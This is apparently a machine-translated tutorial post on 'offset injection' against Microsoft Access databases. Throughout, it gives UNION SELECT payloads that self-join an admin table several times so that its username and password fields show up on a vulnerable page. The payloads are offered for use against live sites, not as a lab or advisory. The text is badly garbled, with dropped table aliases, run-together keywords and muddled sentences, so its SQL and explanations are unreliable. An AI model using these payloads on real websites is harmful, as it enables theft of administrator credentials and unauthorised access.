Access offset Injection

Here is an example of a dynamic article. It contains 28 fields and five fields in the admin table. Then, unionselect1, 18, 19, 20, 21, 24, 25, 26, 27, 28fromadminunionselect1, 20, 21 ,*

I will give an example of the dynamic article. It contains 28 fields and 5 fields in the admin table.

Union select, from admin

Union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17,18, 19,20, 21,22, 23, * from admin

* Five fields? In this way, the names of all tables in admin are cracked, but note that * actually represents the fields of all admin tables. If, for example, username is displayed on the displayed position, it is displayed on the page.

Technology limitations: This method requires a table name and a field name.Id, No other fields, such as password username. Do you want to ask him if he is not in the display position? What I usually don't know is that the table name and table segment name can be found by searching for the background login. This depends on his own.

Let's look at this statement.

Union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, * from (admin as a innerJoinAdmin as B on a. id = B. id)

This (admin as a inner join admin as B on. id = B. id) is the admin table self-join, so that the table after the from will become the table with the double number of fields, the first 18 + 2*5 = 28 fields are valid. * The field represents a wider chance of increasing the display position of username password.

What should I do if I am not there? So

Union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18,. id, * from (admin as a inner join admin as B on. id = B. id)

Union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18,. id, B. id, * from (admin as a inner join admin as B on. id = B. id)

Do you think this statement is legal? 18 + 2 + 5*2 = 30> 28

This is critical. Why is it a legal statement that must be understood at the technical core. Why is it possible that the front side is 30 and the back side is 28? Because. id and B. if the id is in *, the computer automatically removes the unique element in the set to maintain the uniqueness. In this way, although the query results are the same, the order of the fields in * is disrupted! The two interruptions may lead to the username password offset to the displayed position.

What if it is not successful?

Union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13,. id, B. id, c. id, * from (admin as a inner join admin as B on. id = B. id) inner join admin as c on. id = c. id)

Union select 1, 2, 3, 4, 5, 6, 7, 8,. id, B. id, c. id, d. id, * from (admin as a inner join admin as B on. id = B. id) inner join admin as c on. id = c. id) inner join admin as d on. id = d. id)

**************************************** **************************************** **********

Before I see this article, I have an idea to use the join on column name.

After the article, I feel that this is still very limited. If I have time, I will test it myself. After all, SQL statements are powerful.